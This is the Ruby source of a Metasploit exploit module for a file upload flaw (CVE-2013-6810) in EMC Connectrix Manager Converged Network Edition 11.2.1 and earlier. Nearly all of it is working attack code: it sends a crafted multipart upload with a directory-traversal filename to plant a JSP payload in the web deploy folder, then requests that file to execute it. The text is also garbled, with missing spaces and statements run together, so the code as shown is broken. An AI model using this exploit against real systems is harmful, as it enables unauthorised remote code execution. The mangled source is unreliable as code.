require 'msf/core'
classMetasploitModule<Msf::Exploit::RemoteRank=GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info ={})super(update_info(info,'Name'=> 'EMCCMCNEFileUploadControllerRemoteCodeExecution',
'Description'=>%q{Thismoduleexploits a fileupload vulnerability found in EMCConnectrixManagerConvergedNetworkEdition<=11.2.1.The file
upload vulnerability is triggered when sending a specially crafted
filename totheFileUploadControllerservlet.This allows the
attacker toupload a malicious jsp file toanywhere on the remote
file system.},
'License'=>MSF_LICENSE,'Author'=>[ 'james fitts' ],
'References' =>[['ZDI','13-279'],['CVE', '2013-6810' ]],
'Privileged' =>true,
'Platform' => 'win','Arch'=>ARCH_JAVA,
'Targets' =>[[ 'EMCCMCNE11.2.1/WindowsServer2003SP2 ',{}],],
'DefaultTarget'=>0,
'DisclosureDate' => 'Dec182013'))register_options([Opt::RPORT(80)], self.class)
end
def exploit
peer ="#{datastore['RHOST']}:#{datastore['RPORT']}"
deploy ="..\\..\\..\\deploy\\dcm-client.war\\"
jsp = payload.encoded.gsub(/\x0d\x0a/,"").gsub(/\x0a/,"")@jsp_name="#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
data =Rex::MIME::Message.new
data.add_part("#{jsp}","application/octet-stream", nil,"form-data; name=\"source\"; filename=\"#{deploy}#{@jsp_name}\"")
data.add_part("#{rand_text_alpha_upper(5)}", nil, nil,"form-data; name=\"driverFolderName\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/,"--_Part_")print_status("#{peer} - Uploading the JSP Payload...")
res =send_request_cgi({'method'=>'POST','uri'=>normalize_uri("HttpFileUpload","FileUploadController.do"),'ctype'=>"multipart/form-data; boundary=#{data.bound}",'data'=> post_data
})if res.code ==200 and res.body =~/SUCCESSFULLYUPLOADEDFILES!/print_good("File uploaded successfully!")print_status("Executing '#{@jsp_name}' now...")
res =send_request_cgi({'method'=>'GET','uri'=>normalize_uri("dcm-client","#{@jsp_name}")})elseprint_error("Does not look like the files were uploaded to #{peer}...")
end
end
end
